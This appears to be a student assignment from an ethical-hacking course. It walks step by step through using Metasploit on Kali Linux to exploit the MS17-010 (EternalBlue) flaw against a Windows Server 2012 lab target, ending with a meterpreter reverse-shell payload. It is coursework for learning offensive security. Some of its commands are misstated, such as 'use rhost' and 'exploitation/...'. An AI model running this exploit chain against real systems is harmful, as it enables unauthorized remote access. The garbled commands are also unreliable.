Riphah International University, Islamabad: Ethical Hacking

You might also like

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 10

RIPHAH INTERNATIONAL UNIVERSITY,

ISLAMABAD

Name : Wardah Tahir


Shaneela Abbas

Sap ID : 2558
26390

Assignment : 4

Ethical Hacking
Exploitation of vulnerabilities found using metasploit
framework in Kali Linux OS for Windows Server 2012
[Done by Shaneela Abbas]
1. First open your kali Linux machine and open command terminal
2. Now enter into the root mode
sudo –s

3. Now write command msfconsole which opens the metasploit interface. It provides an
“all-in-one” centralized console and allows you efficient access to virtually all of the
options available in the MSF. MSFconsole may seem intimidating at first, but once you
learn the syntax of the commands you will learn to appreciate the power of utilizing this
interface.
4. Run command ms17-010 .Its is most popular exploit against Microsoft windows. This
will at that point be utilized to overwrite the associated session data with as an
Administrator session.

5. Now run command use auxillary/scanner/smb/smb_ms17_010 which will load


metasploit module
6. Run command use rhost <target system Ip Address> in our case its windows server
2012. The following example makes use of a previously acquired set of credentials to
exploit and gain a reverse shell on the target system.

7. Now write command run and enter to check whether the system is vulnerable or not .Its
vulnerable in our case
8. Now we will again search for exploitation as done before through command search
ms17-010 to find any match

9. We will get the info of any exploitation through command info in our case we take info
exploitation/windows/smb/ms17_010_eternalblue_psexec
10. The available targets we have are Automatic , PowerShell ,Native upload, MDF upload.
So we will see for automatic

11. Now run command show options to see the options


12. Now we will rhost and pay load the target and see the options

13. Run command set payload


14. Metasploit has a large collection of payloads designed for all kinds of scenarios.The
purpose of a reverse shell is simple: to get a shell. This is most likely everybody’s first
choice. There are many different reverse shells available, and the most commonly
known and stable has been the windows/meterpreter/reverse_tcp
payload.However,windows/meterpreter/reverse_https is actually a much more
powerful choice because of the encrypted channel, and it allows you to disconnect the
payload (and exit msfconsole) without terminating it. And then the payload will
automatically get back to you as soon as you set up the handler again.

15. Now run command show options


16. Run command run

17. Now we will check if target system is exploited or not ,are we on the system or not to check this
we will run command ipconfig to check the ip address

You might also like